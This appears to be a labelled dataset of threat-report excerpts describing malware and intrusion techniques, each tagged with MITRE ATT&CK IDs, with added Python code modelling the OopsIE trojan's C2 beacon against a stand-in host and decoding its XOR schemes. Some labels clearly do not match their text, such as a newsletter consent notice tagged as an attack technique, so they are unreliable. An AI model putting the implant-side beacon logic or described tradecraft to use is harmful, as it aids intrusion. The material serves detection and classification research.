{"text1":"NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1","labels":"['T1003.001']"}
|
|
{"text1":"At face value, ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. The first execution of ISMInjector starts by copying itself to %localappdata%\\srvBS.txt and enables persistent access to the system","labels":"['T1027']"}
|
|
{"text1":"Regarding the vulnerability leveraged by this attack: while we spotted the attack being performed via Office 2007 running on Windows XP, the fault actually lies in a TIFF-processing component shipped with Microsoft Office. Therefore, not only is Office 2007 on Windows XP vulnerable to this attack; other environments are affected by this vulnerability as well. In addition, our later research showed this exploit also works on Office 2007 running on Windows 7. The Labs has been actively working on getting every detail of this exploit, and we may share additional findings in the near future","labels":"['T1203']"}
|
|
{"text1":"Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users","labels":"['T1585.001']"}
|
|
{"text1":"modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098]) - Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task\/Job [T1053]) - Abuse the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]) - Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process\u2019s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1056.004]) - Use remote services to persist within a victim\u2019s network (External Remote Services [T1133","labels":"['T1505.003', 'T1569.002', 'T1053.005']"}
|
|
{"text1":"The shellcode uses a 16-byte XOR key for decrypting the data as shown in Figure 10","labels":"['T1140']"}
|
|
{"text1":"Recent samples, with the ability to discover wireless network settings and credentials will spawn an instance of netsh.exe after a brief sleeping period (after launch). The syntax utilized initially is","labels":"['T1016']"}
|
|
{"text1":"TA551 has distributed different families of malware, including Ursnif (Gozi\/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. File names for the ZIP archives use the name of the company being spoofed in the email. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed","labels":"['T1566.001']"}
|
|
{"text1":"This section describes how we identified additional Stealth Falcon victims and bait content, and traced Stealth Falcon\u2019s spyware to additional C2 servers","labels":"['T1071.001']"}
|
|
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. The stager will be described in more detail in the next section","labels":"['T1059.001']"}
|
|
{"text1":"Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections","labels":"['T1070.005']"}
|
|
{"text1":"The malware then allows the user to open the file as normal without any indication to the user that anything has occurred","labels":"['T1074.001']"}
|
|
{"text1":"These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims\u2019 networks","labels":"['T1091']"}
|
|
{"text1":"This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear). Every IR presents unique challenges. RAR) included deleted items in Accessed Files STEALTHYATTACKER FUN FACT: Now it\u2019s built-in. DERBYCON 2016 #NOEASYBREACH Matt Dunwoody @matthewdunwoody Nick Carr @itsreallynick","labels":"['T1070.004']"}
|
|
{"text1":"In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named \u201cWinnti","labels":"['T1083']"}
|
|
{"text1":"Pass Logger -> a credential stealer, used for stealing credentials stored in the Chrome, Firefox and Opera browsers","labels":"['T1555.003']"}
|
|
{"text1":"Note: the NTRUEncrypt public key cryptosystem encryption algorithm (NTRU), is a lattice-based alternative to Rivest-Shamir-Adleman, known as RSA, and Elliptic-curve cryptography, or ECC, and is based on the shortest vector problem in a lattice","labels":"['T1486']"}
|
|
{"text1":"On June 28, 2020, our Threat Fusion team identified a new file being downloaded by the Aisino Intelligent Tax product. Rather, this new sample\u2019s sole mission is to delete GoldenSpy and remove any trace that it existed, including the deletion of registry entries and all files and folders (including the GoldenSpy log file); finally, the uninstaller deletes itself with the following command: cmd.exe \/c del \/q C:\\Users\\admin\\AppData\\Local\\Temp\\AWX.exe. Note the \u201c\/c\u201d, which terminates the Windows command-line interpreter after the operation is completed, and \u201c\/q\u201d (quiet mode), which deletes without asking for confirmation or giving any notification","labels":"['T1070.004']"}
|
|
{"text1":"A malware variant named Mal\/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency","labels":"['T1080']"}
|
|
{"text1":"The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim\u2019s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim\u2019s system and sending the results back to the C2","labels":"['T1049']"}
|
|
{"text1":"PsExec is then used to launch PowerShell which uses the win32_service WMI class to retrieve services and the net stop command to stop these services. After Windows Defender is disabled and services have been stopped across the organization, PsExec is used to launch the WastedLocker ransomware itself, which then begins encrypting data and deleting shadow volumes","labels":"['T1562.001', 'T1489', 'T1007']"}
|
|
{"text1":"The file named \u2018lsass.exe\u2019 was downloaded from win10-update[.]com via an HTTP request. The win10-update[.]com domain has been noted in open source as an indicator associated with Chafer threat operations. The lsass.exe file downloaded from this domain is a previously unreported python-based payload that we are currently tracking as MechaFlounder. We believe Chafer uses MechaFlounder as a secondary payload that the group downloads from a first-stage payload to carry out its post-exploitation activities on the compromised host","labels":"['T1036.005']"}
|
|
{"text1":"Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files","labels":"['T1057']"}
|
|
{"text1":"With this approach, the attacker ensures that there is no direct execution (the executable is executed thanks to scheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the docx format is an archive in order to include its executable (GravityRAT","labels":"['T1053.005']"}
|
|
{"text1":"The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration","labels":"['T1059.003']"}
|
|
{"text1":"When the attackers need to send a file or command to the victim machine, they place it in the folder named d in the victim\u2019s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder","labels":"['T1074.001', 'T1567.002']"}
|
|
{"text1":"A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data","labels":"['T1059.006']"}
|
|
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service","labels":"['T1543.003']"}
|
|
{"text1":"The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data. In Windows, Chrome cookies and saved passwords are encrypted using DPAPI","labels":"['T1021.002']"}
|
|
{"text1":"This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. Secondly, the author split the malware in a couple of different files. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files","labels":"['T1105']"}
|
|
{"text1":"Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download","labels":"['T1197']"}
|
|
{"text1":"Contacts an IP address \/ domain that was used to host a malicious document from a Lazarus previous campaign in 2017 - Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns - Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns - The techniques, tactics and procedures align with Lazarus group\u2019s interest in crypto currency theft","labels":"['T1001.003']"}
|
|
{"text1":"Check the email sender, subject, and body for anything suspicious before downloading and opening email attachments. Check the file extension of the attached file and make sure it is the intended file format. Avoid activating macros for any attached Microsoft Office files, especially for emails that request macro activation using an image in the body of the opened file or those that don\u2019t show anything. Subtle changes to a popular URL can be one indicator of malicious content","labels":"['T1204.002']"}
|
|
{"text1":"1) Checks if the user has Administrator privilege 2) Drops the Cobalt Strike Stager in debug or \u201c%TEMP%\u201d directory as \u201ctmp_FlVnNI.dat\u201d depending on the user privilege 3) Opens the decoy Word document 4) Locates the InstallUtil.exe and its installed version 5) Copies \u201cschtasks.exe\u201d to \u201c%TEMP%\u201d directory and renames it to \u201cwtask.exe\u201d 6) Creates Scheduled tasks with the name \u201cSecurity Script kb00855787\u201d 7) Renames \u201cwscript.exe\u201d into \u201cwinwsh.exe\u201d 8) Runs the scheduled task to execute the Cobalt Strike Stager 9) C2 communication","labels":"['T1053.005']"}
|
|
{"text1":"The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc","labels":"['T1082']"}
|
|
{"text1":"While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk.<hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what.<hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are","labels":"['T1105', 'T1030']"}
|
|
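Worked example, added here and not Unit 42's code: a minimal offline model of the OopsIE check-in exchange described in the record above, covering the implant side (client identifier, chk and what URLs, response parsing, the Oops exit) and a constructed mock C2 so both directions of the exchange can be traced without network access. Two assumptions the report does not state: the UserName/MachineName string is ASCII-encoded before hex conversion, and the task "exec" with parameter "whoami" is a hypothetical placeholder, since the report's command table is not reproduced here.

```python
"""
Added example (not Unit 42's code): offline model of the OopsIE beacon.
Assumed: ASCII encoding of "<user>/<machine>" before hex conversion; the
command names used with MockC2 are hypothetical placeholders.
"""
import binascii
from typing import Dict, Optional, Tuple

# (command, parameters); command None means the server answers "Oops".
Task = Tuple[Optional[str], str]


def client_id(user: str, machine: str) -> str:
    """hex(Environment.UserName/Environment.MachineName), ASCII assumed."""
    return binascii.hexlify(f"{user}/{machine}".encode("ascii")).decode("ascii")


def chk_url(c2: str, cid: str) -> str:
    """Beacon URL; the C2 must echo cid back to signal that work is queued."""
    return f"http://{c2}/chk.{cid}"


def what_url(c2: str, cid: str) -> str:
    """Task-retrieval URL, issued only after a successful chk echo."""
    return f"http://{c2}/what.{cid}"


def parse_what_response(body: str) -> Optional[Tuple[str, str]]:
    """'Oops' -> None (implant exits).  Otherwise '[command]<>[hex params]'
    is split on the <> delimiter and the parameters are hex-decoded."""
    if body.strip() == "Oops":
        return None
    command, _, params_hex = body.partition("<>")
    params_hex = params_hex.strip()
    params = binascii.unhexlify(params_hex).decode("ascii", "replace") if params_hex else ""
    return command.strip(), params


class MockC2:
    """Constructed stand-in for the server side, keyed by client identifier."""

    def __init__(self, tasks: Dict[str, Task]):
        self.tasks = dict(tasks)

    def handle(self, url: str) -> str:
        path = url.split("://", 1)[1].split("/", 1)[1]
        action, _, cid = path.partition(".")
        if cid not in self.tasks:
            return ""            # no echo: implant drops srvCheckresponded.tmp and exits
        if action == "chk":
            return cid           # echo means "I have a command for you"
        if action == "what":
            command, params = self.tasks[cid]
            if command is None:
                return "Oops"
            return f"{command}<>{binascii.hexlify(params.encode('ascii')).decode('ascii')}"
        return ""


def beacon(c2: str, user: str, machine: str, server: MockC2):
    """One implant check-in; returns the branch taken and any parsed task."""
    cid = client_id(user, machine)
    if server.handle(chk_url(c2, cid)) != cid:
        return "no-task", None
    parsed = parse_what_response(server.handle(what_url(c2, cid)))
    if parsed is None:
        return "oops-exit", None
    return "task", parsed


if __name__ == "__main__":
    cid = client_id("alice", "WS01")
    server = MockC2({cid: ("exec", "whoami")})   # hypothetical task
    print(chk_url("c2.example", cid))
    print(beacon("c2.example", "alice", "WS01", server))
```

For detection purposes the useful artefacts are the two URL shapes, chk.<hex> and what.<hex>, where the hex segment decodes to a string containing a forward slash; a proxy-log search for that pattern from a browser-like User-Agent is independent of whatever commands the C2 actually serves.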
{"text1":"Update the RAT and Keylogger remotely - Set an autostart JavaScript to run on RAT startup - A Domain Generation Algorithm (DGA) for C2 resiliency - If the user has admin permissions, it deletes shadow copies using vssadmin.exe","labels":"['T1568.002']"}
|
|
{"text1":"The wiper is relatively small in size and dynamically resolves most of the APIs it uses. Before starting any file destruction, it checks to ensure that the machine is not a domain controller. If the machine is a domain controller, it stops execution. Pseudo-code: CaddyWiper checking for the Domain Controller role of the machine. If the system is not a domain controller, the wiper will destroy files on \"C:\\Users,\" followed by wiping of all files in the next drive letter until it reaches the \"Z\" drive. This means that the wiper will also attempt to wipe any network mapped drive attached to the system","labels":"['T1082']"}
|
|
{"text1":"While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. The downloader will use the filename of the script (ex","labels":"['T1071.001']"}
|
|
{"text1":"As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running","labels":"['T1047']"}
|
|
{"text1":"Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea","labels":"['T1036.005']"}
|
|
{"text1":"We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China","labels":"['T1553.002']"}
|
|
{"text1":"Summary . The following knowledgebase will explain the uses of Net commands in Windows Operating Systems. More information . Net Commands On Windows Operating Systems . The following Net Commands can be used to perform operations on Groups, users, account policies, shares, and so on. NET . The \"Net Accounts\" command is used to set the policy settings on the local computer, such as Account policies and password policies. This command can't be used on a domain controller. When you type Net Accounts, you will see the default settings of the Account Lockout policy and Password Policy on the local computer, shown as: The above settings are displayed according to the role of the computer. Community Solutions Content Disclaimer . Microsoft corporation and\/or its respective suppliers make no representations about the suitability, reliability, or accuracy of the information and related graphics contained herein. User Account Control and remote restrictions - Windows Server Describes User Account Control (UAC) and remote restrictions in Windows Vista. auditpol get Reference article for the auditpol get command, which retrieves the system policy, per-user policy, auditing options, and audit security descriptor object. wevtutil Reference article for wevtutil, which lets you retrieve information about event logs and publishers. Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - \u00a9 Microsoft 2022","labels":"['T1087.002']"}
|
|
{"text1":"In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain","labels":"['T1102.001']"}
|
|
{"text1":"As part of our investigation, we monitored exactly what the cybercriminals did on an infected PC. In particular, they downloaded an auxiliary program ff._exe to the Config.Msi folder on the infected machine","labels":"['T1105']"}
|
|
{"text1":"Looking at the binaries for SUNBURST and TEARDROP, we\u2019ve learned that even this wildly successful operation had its rough edges. Far from a worry-free power trip, the attackers were wary all the while of having their activity seen at all, never mind recognized for what it was; extensive blacklists of domains and processes had to be created to make sure of that","labels":"['T1027']"}
|
|
{"text1":"I agree to provide my email address to \u201cAO Kaspersky Lab\u201d to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the \u201cunsubscribe\u201d link that I find at the bottom of any e-mail sent to me for the purposes mentioned above","labels":"['T1204.001']"}
|
|
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In October 2016 Group-IB published a report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code: emails with Word documents containing a malicious macro. When opening the document, the user must click on the \"Enable content\" button, which enables macros (fig. 5: example of an email message with a Word document which, when opened, requires the user to click on the \"Enable content\" button to enable a malicious macro; fig. 6: example of a message sent by attackers from a domain whose name is similar to the name of a real domain). As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded into memory. In addition, Cobalt Strike lets its users avoid leaving a fragment of memory allocated in the context of another process with the RWX (Read, Write, Execute) attributes, which often reveal injected code","labels":"['T1059.005']"}
|
|
{"text1":"The Zip archive is encrypted with an unknown password, but we know it contains two files named joboffer.chm and thumb.db. The joboffer.chm file is a compiled HTML file that we believe loads and executes the \u2018thumb.db\u2019 file as a payload, but we cannot be absolutely sure as we do not have the password required to extract the files from the archive","labels":"['T1218.001']"}
|
|
{"text1":"Recently, after looking at the difference between 0vercl0ck\u2019s proof of concept and the real deal, a friend asked me \u201cWhy does PowerLoader go to all the trouble of using ROP chains instead of just executing the shellcode like 0vercl0ck does. PowerLoader gets the malicious code into the process by opening an existing, shared section already mapped into explorer, removing the need to allocate heap space or overwrite process memory. By opening \u201cShell_TrayWnd\u201d and calling SetWindowLong, PowerLoader is able to set a variable used by the window procedure to point to a specific address in its shellcode. The read part won\u2019t trigger DEP (Data Execution Prevention) if the section is not executable (in later versions of Windows it is execute-protected); however, if EAX points to an address inside the section, DEP will be triggered. Well, how does one get from KiUserApcDispatcher to code execution without executing the non-executable shellcode, I hear you ask. Next it pops the return address into EAX and then calls it; this results in execution being transferred back to the Window Procedure. The sequences are instructions within the executable regions of explorer\u2019s memory; their purpose is to perform certain operations, as PowerLoader can\u2019t execute any of its own code yet, due to the section being execute-protected. 00100E28 points to some code in explorer that executes the instruction \u201cSTD\u201d followed by \u201cRET\u201d. As a result, the instruction underlined in red will result in the direction flag being set and execution being returned to the Window Procedure. Well, these bytes were found, in this case inside some random shell32 function (it doesn\u2019t matter). Now the pointer doesn\u2019t point to the start of the function, it points somewhere in the middle; as a result, only the bytes in the red box are executed. 
Remember: because all addresses point to executable code within explorer's address space, and they are called using a pointer, no code in the shellcode is actually executed, thus resulting in no nasty DEP errors","labels":"['T1055.011']"}
|
|
{"text1":"Then it calls the fcL4qOb4 function to set the scheduled task and disguises it as the one used by Google","labels":"['T1036.004', 'T1053.005']"}
|
|
{"text1":"This module has been described before in the article here. The first instructions in the main function hide the console window from the user. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files","labels":"['T1564.003']"}
|
|
{"text1":"Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1569.001']"}
|
|
{"text1":"Researchers also observed that the backdoor downloads and executes the Cobalt Strike pentesting and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold\u00a0in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors","labels":"['T1105']"}
|
|
{"text1":"Stop the running xmlprov service - Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory - Check if the xmlProv service is installed or not and if it is not installed create the service through svchost.exe - Modify the xmlProv service values including type and binpath - Add xmlProv to the list of the services to be loaded by svchost - Add xmlProv to the xmlProv registry key - Start the xmlProv service","labels":"['T1112']"}
|
|
{"text1":"We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers","labels":"['T1059.007']"}
|
|
{"text1":"HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA","labels":"['T1567.002']"}
|
|
{"text1":"We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also used different types of encryption in order to protect data in transit","labels":"['T1497.001']"}
|
|
{"text1":"Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA","labels":"['T1027']"}
|
|
{"text1":"As part of this research, I reached out to Benjamin Delpy, author of Mimikatz, and requested he add \u201cSID History\u201d to Mimikatz forged Kerberos tickets. The June 28th version of Mimikatz now includes the capability to include arbitrary SIDs in SID History on forged tickets. When a user is authenticated, the SIDs of every security group the user is a member of are added to the user\u2019s Kerberos ticket, as well as any SIDs in the user\u2019s SID History. Golden Tickets . Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. In other words, in a multi-domain AD forest, if the domain the Golden Ticket was created in doesn\u2019t contain the Enterprise Admins group, the Golden Ticket won\u2019t provide admin rights to other domains in the forest. The standard Golden Ticket is limited to the child domain it was created in, so now we add SID History to the equation\u2026 . Golden Ticket + SID History = WINNING. Things get more interesting once Mimikatz supports SID History in Golden Tickets (and Silver Tickets) since any group in the AD Forest can be included and used for authorization decisions. In order to support my research into how to expand access using SID History in Kerberos tickets across trusts (both intra-forest and external), I reached out to Benjamin Delpy in late June and requested SID History be added. Using the latest version of Mimikatz, we can now add SID History to the Golden Ticket for the Forest Enterprise Admins group. In summary, Golden Tickets can now be used to compromise any domain in the AD Forest once a single one is compromised","labels":"['T1134.005']"}
|
|
{"text1":"In this campaign, Earth Vetala threat actors used spearphishing emails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool","labels":"['T1204.001']"}
|
|
{"text1":"Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the .\/LOGS directory","labels":"['T1074.001', 'T1560.003']"}
|
|
{"text1":"The ScreenUtil module, which was first reported in 2017, takes a screenshot of the current user's desktop. All variants analyzed by CTU researchers were hard-coded to drop the captured image files to %APPDATA%\\Update\\Tmp","labels":"['T1113']"}
|
|
{"text1":"If the \u2018-p\u2019 parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes","labels":"['T1055.012', 'T1055.013']"}
|
|
{"text1":"Log keystrokes and the titles of open windows - Gather clipboard data and system information - Steal printer information and any documents that were sent to be printed - Record audio - Capture screenshots and webcam photos","labels":"['T1120']"}
|
|
{"text1":"The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key","labels":"['T1573.001', 'T1560.003']"}
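The two XOR schemes described in this file, a single-byte key of 0xAA applied to command results (the OneDrive-based backdoor above) and a two-byte key carried as the first two bytes of a Base64-decoded value (the UprotectData() method here), as one added decoder. This is example code written for this page, not code from either report; it assumes, which neither excerpt states, that the two-byte key is applied as a repeating key over the remaining bytes and that the key bytes are not themselves part of the plaintext.

```python
"""Added example (not code from the reports quoted above): decoding the two
XOR schemes described in this file, a single-byte key (0xAA) and a two-byte
key carried as the first two bytes of a Base64-decoded blob.

Assumptions (not stated in the source excerpts): the two-byte key is applied
as a repeating key over the remaining bytes, and the first two bytes are not
themselves part of the plaintext.
"""
import base64
from itertools import cycle


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (works for 1-byte and 2-byte keys alike)."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_xor_0xaa(blob: bytes) -> bytes:
    """Single-byte scheme: every byte XORed with 0xAA."""
    return xor_repeating(blob, b"\xaa")


def decode_prefixed_key(b64_value: str) -> bytes:
    """Two-byte scheme: Base64-decode, take the first two bytes as the key,
    XOR the remainder with that key."""
    raw = base64.b64decode(b64_value)
    if len(raw) < 2:
        raise ValueError("value too short to carry a two-byte key")
    key, body = raw[:2], raw[2:]
    return xor_repeating(body, key)


def encode_prefixed_key(plaintext: bytes, key: bytes) -> str:
    """Inverse of decode_prefixed_key; used here only to build sample data."""
    if len(key) != 2:
        raise ValueError("key must be exactly two bytes")
    return base64.b64encode(key + xor_repeating(plaintext, key)).decode("ascii")


if __name__ == "__main__":
    # Constructed sample: a fake "command result" as a loader might write it.
    sample = encode_prefixed_key(b"whoami: CORP\\jdoe", b"\x13\x37")
    print(sample, "->", decode_prefixed_key(sample))
```

Because XOR is its own inverse, the same `xor_repeating` routine both produces and strips the encoding; when triaging a sample, the only decision left is where the key lives (a constant in the binary, or the leading bytes of each record).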
|
|
{"text1":"We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listen on TCP port 7001 by default. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset","labels":"['T1046']"}
|
|
{"text1":"The server uses folders in the current directory to store information sent and received from WellMess backdoors and the folder layout is shown in Figure 2. Additionally, the server uses a private key and certificate located in the current working directory during mutual TLS connections","labels":"['T1573.002']"}
|
|
